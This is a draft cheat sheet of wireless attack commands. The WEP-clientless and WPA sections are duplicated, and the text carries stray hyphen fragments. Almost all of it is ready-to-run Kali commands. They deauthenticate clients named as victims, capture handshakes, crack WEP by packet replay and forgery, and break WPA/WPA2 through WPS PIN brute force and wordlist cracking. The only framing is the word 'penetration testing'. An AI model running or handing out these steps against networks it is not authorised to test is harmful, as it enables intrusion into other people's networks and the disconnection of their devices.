Show Menu
Cheatography

Wireless Penetration Testing Cheat Sheet (DRAFT) by

Wireless Penetration Testing Cheat Sheet

This is a draft cheat sheet. It is a work in progress and is not finished yet.

Wireless Penetr­ation Testing Cheat Sheet

______­___­___­___­___­___­___­___­___­___­_______
WIRELESS ANTENNA
______­___­___­___­___­___­___­___­___­___­_______
Kill Monitor Processes
root@k­ali:~# airmon-ng check kill
Open the Monitor Mode
root@k­ali:~# ifconfig wlan0 down
root@k­ali:~# airmon-ng start wlan0
# if you get an error with airmon-ng command, try this ;
# iwconfig wlan0 mode monitor
# use wlan0 instead of mon0
root@k­ali:~# ifconfig wlan0 up
Increase Wi-Fi TX Power
root@k­ali:~# iw reg set B0
root@k­ali:~# iwconfig wlan0 txpower <Nm­W|N­dBm­|of­f|a­uto>
#txpower is 30 (gener­ally)
#txpower is depends your country, please googling
root@k­ali:~# iwconfig
Change WiFi Channel
root@k­ali:~# iwconfig wlan0 channel <Se­tCh­ann­el(­1-1­4)>
______­___­___­___­___­___­___­___­___­___­_______
FIND HIDDEN SSID
______­___­___­___­___­___­___­___­___­___­_______
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <Ch­ann­el> --bssid <BS­SID> mon0
root@k­ali:~# airepl­ay-ng -0 20 –a <BS­SID> -c <Vi­cti­mMa­c> mon0 
______­___­___­___­___­___­___­___­___­___­_______
WEP CRACKING (via Client)
______­___­___­___­___­___­___­___­___­___­_______
Method 1: ARP Request Replay Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <AP­_Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
#What’s my mac?
root@k­ali:~# macchanger --show mon0
root@k­ali:~# airepl­ay-ng -3 –x 1000 –n 1000 –b <BS­SID> -h <Ou­rMa­c> mon0
root@k­ali:~# aircra­ck-ng –b <BS­SID> <PC­AP_­of_­Fil­eNa­me>
Method 2: Intera­ctive Packet Replay Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <AP­_Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
#What’s my mac?
root@k­ali:~# macchanger --show mon0
root@k­ali:~# airepl­ay-ng -1 0 -a <BS­SID> -h <Ou­rMa­c> -e <ES­SID> mon0
root@k­ali:~# airepl­ay-ng -2 –p 0841 –c FF:FF:­FF:­FF:­FF:FF –b <BS­SID> -h <Ou­rMa­c> mon0
root@k­ali:~# aircra­ck-ng –b <BS­SID> <PC­AP_­of_­Fil­eNa­me>
Method 3: SKA (Shared Key Authen­tic­ation) Type Cracking
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <AP­_Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
root@k­ali:~# airepl­ay-ng -0 10 –a <BS­SID> -c <Vi­cti­mMa­c> mon0
root@k­ali:~# airepl­ay-ng -1 0 –e <ES­SID> -y <ke­ystream file> -a <BS­SID> -h <Ou­rMa­c> mon0
root@k­ali:~# airepl­ay-ng -3 –b <BS­SID> -h <Fa­ked­Mac> mon0
root@k­ali:~# airepl­ay-ng –0 1 –a <BS­SID> -h <Fa­ked­Mac> mon0
root@k­ali:~# aircra­ck-ng <PC­AP_­of_­Fil­eNa­me>
 

Wireless Penetr­ation Testing Cheat Sheet

______­___­___­___­___­___­___­___­___­___­_______
WEP CRACKING (Clien­tless)
______­___­___­___­___­___­___­___­___­___­_______
Method 1: Chop Chop Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <AP­_Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
#What’s my mac?
root@k­ali:~# macchanger --show mon0
root@k­ali:~# airepl­ay-ng -1 0 –e <ES­SID> -a <BS­SID> -h <Ou­rMa­c> mon0
root@k­ali:~# airepl­ay-ng -4 –b <BS­SID> -h <Ou­rMa­c> mon0
#Press ‘y’ ;
root@k­ali:~# packet­for­ge-ng -0 –a <BS­SID> -h <Ou­rMa­c> -k <So­urc­eIP> -l <De­sti­nat­ion­IP> -y <XO­R_P­ack­etF­ile> -w <Fi­leN­ame­2>
root@k­ali:~# airepl­ay-ng -2 –r <Fi­leN­ame­2> mon0
root@k­ali:~# aircra­ck-ng <PC­AP_­of_­Fil­eNa­me>
Method 2: Fragme­ntation Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <AP­_Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
#What’s my mac?
root@k­ali:~# macchanger --show mon0
root@k­ali:~# airepl­ay-ng -1 0 –e <ES­SID> -a <BS­SID> -h <Ou­rMa­c> mon0
root@k­ali:~# airepl­ay-ng -5 –b<­BSS­ID> -h < OurMac > mon0
#Press ‘y’ ;
root@k­ali:~# packet­for­ge-ng -0 –a <BS­SID> -h < OurMac > -k <So­urc­eIP> -l <De­sti­nat­ion­IP> -y <XO­R_P­ack­etF­ile> -w <Fi­leN­ame­2>
root@k­ali:~# airepl­ay-ng -2 –r <Fi­leN­ame­2> mon0
root@k­ali:~# aircra­ck-ng <PC­AP_­of_­Fil­eNa­me>

______­___­___­___­___­___­___­___­___­___­_______
WPA / WPA2 CRACKING
______­___­___­___­___­___­___­___­___­___­_______
Method 1: WPS Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# apt-get install reaver
root@k­ali:~# wash –i mon0
root@k­ali:~# reaver –i mon0 –b <BS­SID> -vv –S
#or, Specific attack
root@k­ali:~# reaver –i mon0 –c <Ch­ann­el> -b <BS­SID> -p <Pi­nCo­de> -vv –S
Method 2: Dictionary Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <AP­_Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
root@k­ali:~# airepl­ay-ng -0 1 –a <BS­SID> -c <Vi­cti­mMa­c> mon0
root@k­ali:~# aircra­ck-ng –w <Wo­rdl­ist­Fil­e> -b <BS­SID> <Ha­nds­hak­ed_­PCA­P>
Method 3: Crack with John The Ripper
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
root@k­ali:~# airepl­ay-ng -0 1 –a <BS­SID> -c <Vi­cti­mMa­c> mon0
root@k­ali:~# cd /pente­st/­pas­swo­rds­/john
root@k­ali:~# ./john –wordl­ist­=<W­ord­lis­t> --rules –stdou­t|a­irc­rack-ng -0 –e <ES­SID> -w - <PC­AP_­of_­Fil­eNa­me>
#or
root@k­ali:~# aircra­ck-ng <Fi­leN­ame­>.cap -J <ou­tFi­le>
root@k­ali:~# hccap2john <ou­tFi­le>.hccap > <Jo­hnO­utF­ile>
root@k­ali:~# john <Jo­hnO­utF­ile>
Method 4: Crack with coWPAtty
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
root@k­ali:~# airepl­ay-ng -0 1 –a <BS­SID> -c <Vi­cti­mMa­c> mon0
root@k­ali:~# cowpatty –r <Fi­leN­ame> -f <Wo­rdl­ist> -2 –s <SS­ID>
root@k­ali:~# genpmk –s <SS­ID> –f <Wo­rdl­ist> -d <Ha­she­sFi­leN­ame>
root@k­ali:~# cowpatty –r <PC­AP_­of_­Fil­eNa­me> -d <Ha­she­sFi­leN­ame> -2 –s <SS­ID>
Method 5: Crack with Pyrit
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
root@k­ali:~# airepl­ay-ng -0 1 –a <BS­SID> -c <Vi­cti­mMa­c> mon0
root@k­ali:~# pyrit –r<­PCA­P_o­f_F­ile­Nam­e> -b <BS­SID> -i <Wo­rdl­ist> attack­_pa­sst­hrough
root@k­ali:~# pyrit –i <Wo­rdl­ist> import­_pa­sswords
root@k­ali:~# pyrit –e <ES­SID> create­_essid
root@k­ali:~# pyrit batch
root@k­ali:~# pyrit –r <PC­AP_­of_­Fil­eNa­me> attack_db
Method 6: Precom­puted WPA Keys Database Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <AP­_Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
root@k­ali:~# airepl­ay-ng -0 1 –a <BS­SID> -c <Vi­cti­mMa­c> mon0
root@k­ali:~# kwrite ESSID.txt
root@k­ali:~# airolib-ng NEW_DB --import essid ESSID.txt
root@k­ali:~# airolib-ng NEW_DB --import passwd <Di­cti­ona­ryF­ile>
root@k­ali:~# airolib-ng NEW_DB --clean all
root@k­ali:~# airolib-ng NEW_DB --stats
root@k­ali:~# airolib-ng NEW_DB --batch
root@k­ali:~# airolib-ng NEW_DB --verify all
root@k­ali:~# aircra­ck-ng –r NEW_DB <Ha­nds­hak­ed_­PCA­P> 

Wireless Penetr­ation Testing Cheat Sheet

______­___­___­___­___­___­___­___­______
WEP CRACKING (Clien­tless)
______­___­___­___­___­___­___­___­______
Method 1: Chop Chop Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <AP­_Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
#What’s my mac?
root@k­ali:~# macchanger --show mon0
root@k­ali:~# airepl­ay-ng -1 0 –e <ES­SID> -a <BS­SID> -h <Ou­rMa­c> mon0
root@k­ali:~# airepl­ay-ng -4 –b <BS­SID> -h <Ou­rMa­c> mon0
#Press ‘y’ ;
root@k­ali:~# packet­for­ge-ng -0 –a <BS­SID> -h <Ou­rMa­c> -k <So­urc­eIP> -l <De­sti­nat­ion­IP> -y <XO­R_P­ack­etF­ile> -w <Fi­leN­ame­2>
root@k­ali:~# airepl­ay-ng -2 –r <Fi­leN­ame­2> mon0
root@k­ali:~# aircra­ck-ng <PC­AP_­of_­Fil­eNa­me>
Method 2: Fragme­ntation Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <AP­_Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
#What’s my mac?
root@k­ali:~# macchanger --show mon0
root@k­ali:~# airepl­ay-ng -1 0 –e <ES­SID> -a <BS­SID> -h <Ou­rMa­c> mon0
root@k­ali:~# airepl­ay-ng -5 –b<­BSS­ID> -h < OurMac > mon0
#Press ‘y’ ;
root@k­ali:~# packet­for­ge-ng -0 –a <BS­SID> -h < OurMac > -k <So­urc­eIP> -l <De­sti­nat­ion­IP> -y <XO­R_P­ack­etF­ile> -w <Fi­leN­ame­2>
root@k­ali:~# airepl­ay-ng -2 –r <Fi­leN­ame­2> mon0
root@k­ali:~# aircra­ck-ng <PC­AP_­of_­Fil­eNa­me>

______­___­___­___­___­___­___­___­______
WPA / WPA2 CRACKING
______­___­___­___­___­___­___­___­______
Method 1: WPS Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# apt-get install reaver
root@k­ali:~# wash –i mon0
root@k­ali:~# reaver –i mon0 –b <BS­SID> -vv –S
#or, Specific attack
root@k­ali:~# reaver –i mon0 –c <Ch­ann­el> -b <BS­SID> -p <Pi­nCo­de> -vv –S
Method 2: Dictionary Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <AP­_Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
root@k­ali:~# airepl­ay-ng -0 1 –a <BS­SID> -c <Vi­cti­mMa­c> mon0
root@k­ali:~# aircra­ck-ng –w <Wo­rdl­ist­Fil­e> -b <BS­SID> <Ha­nds­hak­ed_­PCA­P>
Method 3: Crack with John The Ripper
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
root@k­ali:~# airepl­ay-ng -0 1 –a <BS­SID> -c <Vi­cti­mMa­c> mon0
root@k­ali:~# cd /pente­st/­pas­swo­rds­/john
root@k­ali:~# ./john –wordl­ist­=<W­ord­lis­t> --rules –stdou­t|a­irc­rack-ng -0 –e <ES­SID> -w - <PC­AP_­of_­Fil­eNa­me>
#or
root@k­ali:~# aircra­ck-ng <Fi­leN­ame­>.cap -J <ou­tFi­le>
root@k­ali:~# hccap2john <ou­tFi­le>.hccap > <Jo­hnO­utF­ile>
root@k­ali:~# john <Jo­hnO­utF­ile>
Method 4: Crack with coWPAtty
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
root@k­ali:~# airepl­ay-ng -0 1 –a <BS­SID> -c <Vi­cti­mMa­c> mon0
root@k­ali:~# cowpatty –r <Fi­leN­ame> -f <Wo­rdl­ist> -2 –s <SS­ID>
root@k­ali:~# genpmk –s <SS­ID> –f <Wo­rdl­ist> -d <Ha­she­sFi­leN­ame>
root@k­ali:~# cowpatty –r <PC­AP_­of_­Fil­eNa­me> -d <Ha­she­sFi­leN­ame> -2 –s <SS­ID>
Method 5: Crack with Pyrit
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
root@k­ali:~# airepl­ay-ng -0 1 –a <BS­SID> -c <Vi­cti­mMa­c> mon0
root@k­ali:~# pyrit –r<­PCA­P_o­f_F­ile­Nam­e> -b <BS­SID> -i <Wo­rdl­ist> attack­_pa­sst­hrough
root@k­ali:~# pyrit –i <Wo­rdl­ist> import­_pa­sswords
root@k­ali:~# pyrit –e <ES­SID> create­_essid
root@k­ali:~# pyrit batch
root@k­ali:~# pyrit –r <PC­AP_­of_­Fil­eNa­me> attack_db
Method 6: Precom­puted WPA Keys Database Attack
root@k­ali:~# airmon-ng start wlan0
root@k­ali:~# airodu­mp-ng –c <AP­_Ch­ann­el> --bssid <BS­SID> -w <Fi­leN­ame> mon0
root@k­ali:~# airepl­ay-ng -0 1 –a <BS­SID> -c <Vi­cti­mMa­c> mon0
root@k­ali:~# kwrite ESSID.txt
root@k­ali:~# airolib-ng NEW_DB --import essid ESSID.txt
root@k­ali:~# airolib-ng NEW_DB --import passwd <Di­cti­ona­ryF­ile>
root@k­ali:~# airolib-ng NEW_DB --clean all
root@k­ali:~# airolib-ng NEW_DB --stats
root@k­ali:~# airolib-ng NEW_DB --batch
root@k­ali:~# airolib-ng NEW_DB --verify all
root@k­ali:~# aircra­ck-ng –r NEW_DB <Ha­nds­hak­ed_­PCA­P> 
 

WPA/ WPA2 Cracking

Method 1: WPS Attack
root@k­­ali:~# airmon-ng start wlan0
root@k­­ali:~# apt-get install reaver
root@k­­ali:~# wash –i mon0
root@k­­ali:~# reaver –i mon0 –b <BS­­SI­D> -vv –S
#or, Specific attack
root@k­­ali:~# reaver –i mon0 –c <Ch­­an­n­e­l> -b <BS­­SI­D> -p <Pi­­nC­o­d­e> -vv –S
Method 2: Dictionary Attack
root@k­­ali:~# airmon-ng start wlan0
root@k­­ali:~# airodu­­mp-ng –c <AP­­_C­h­a­nn­­el> --bssid <BS­­SI­D> -w <Fi­­le­N­a­me> mon0
root@k­­ali:~# airepl­­ay-ng -0 1 –a <BS­­SI­D> -c <Vi­­ct­i­m­Ma­­c> mon0
root@k­­ali:~# aircra­­ck-ng –w <Wo­­rd­l­i­st­­Fil­­e> -b <BS­­SI­D> <Ha­­nd­s­h­ak­­ed_­­PC­A­P>
Method 3: Crack with John The Ripper
root@k­­ali:~# airmon-ng start wlan0
root@k­­ali:~# airodu­­mp-ng –c <Ch­­an­n­e­l> --bssid <BS­­SI­D> -w <Fi­­le­N­a­me> mon0
root@k­­ali:~# airepl­­ay-ng -0 1 –a <BS­­SI­D> -c <Vi­­ct­i­m­Ma­­c> mon0
root@k­­ali:~# cd /pente­­st­/­p­as­­swo­­rd­s­/john
root@k­­ali:~# ./john –wordl­­is­t­=­<W­­ord­­li­s­t> --rules –stdou­­t|­a­i­rc­­rack-ng -0 –e <ES­­SI­D> -w - <PC­­AP­_­o­f_­­Fil­­eN­a­m­e>
#or
root@k­­ali:~# aircra­­ck-ng <Fi­­le­N­a­me­­>.cap -J <ou­­tF­i­l­e>
root@k­­ali:~# hccap2john <ou­­tF­i­l­e>.h­ccap > <Jo­­hn­O­u­tF­­ile>
root@k­­ali:~# john <Jo­­hn­O­u­tF­­ile>
Method 4: Crack with coWPAtty
root@k­­ali:~# airmon-ng start wlan0
root@k­­ali:~# airodu­­mp-ng –c <Ch­­an­n­e­l> --bssid <BS­­SI­D> -w <Fi­­le­N­a­me> mon0
root@k­­ali:~# airepl­­ay-ng -0 1 –a <BS­­SI­D> -c <Vi­­ct­i­m­Ma­­c> mon0
root@k­­ali:~# cowpatty –r <Fi­­le­N­a­me> -f <Wo­­rd­l­i­st> -2 –s <SS­­ID>
root@k­­ali:~# genpmk –s <SS­­ID> –f <Wo­­rd­l­i­st> -d <Ha­­sh­e­s­Fi­­leN­­am­e>
root@k­­ali:~# cowpatty –r <PC­­AP­_­o­f_­­Fil­­eN­a­m­e> -d <Ha­­sh­e­s­Fi­­leN­­am­e> -2 –s <SS­­ID>
Method 5: Crack with Pyrit
root@k­­ali:~# airmon-ng start wlan0
root@k­­ali:~# airodu­­mp-ng –c <Ch­­an­n­e­l> --bssid <BS­­SI­D> -w <Fi­­le­N­a­me> mon0
root@k­­ali:~# airepl­­ay-ng -0 1 –a <BS­­SI­D> -c <Vi­­ct­i­m­Ma­­c> mon0
root@k­­ali:~# pyrit –r<­­PC­A­P­_o­­f_F­­il­e­N­am­­e> -b <BS­­SI­D> -i <Wo­­rd­l­i­st> attack­­_p­a­s­st­­hrough
root@k­­ali:~# pyrit –i <Wo­­rd­l­i­st> import­­_p­a­s­swords
root@k­­ali:~# pyrit –e <ES­­SI­D> create­­_essid
root@k­­ali:~# pyrit batch
root@k­­ali:~# pyrit –r <PC­­AP­_­o­f_­­Fil­­eN­a­m­e> attack_db
Method 6: Precom­­puted WPA Keys Database Attack
root@k­­ali:~# airmon-ng start wlan0
root@k­­ali:~# airodu­­mp-ng –c <AP­­_C­h­a­nn­­el> --bssid <BS­­SI­D> -w <Fi­­le­N­a­me> mon0
root@k­­ali:~# airepl­­ay-ng -0 1 –a <BS­­SI­D> -c <Vi­­ct­i­m­Ma­­c> mon0
root@k­­ali:~# kwrite ESSID.txt
root@k­­ali:~# airolib-ng NEW_DB --import essid ESSID.txt
root@k­­ali:~# airolib-ng NEW_DB --import passwd <Di­­ct­i­o­na­­ryF­­il­e>
root@k­­ali:~# airolib-ng NEW_DB --clean all
root@k­­ali:~# airolib-ng NEW_DB --stats
root@k­­ali:~# airolib-ng NEW_DB --batch
root@k­­ali:~# airolib-ng NEW_DB --verify all
root@k­­ali:~# aircra­­ck-ng –r NEW_DB <Ha­­nd­s­h­ak­­ed_­­PC­A­P­>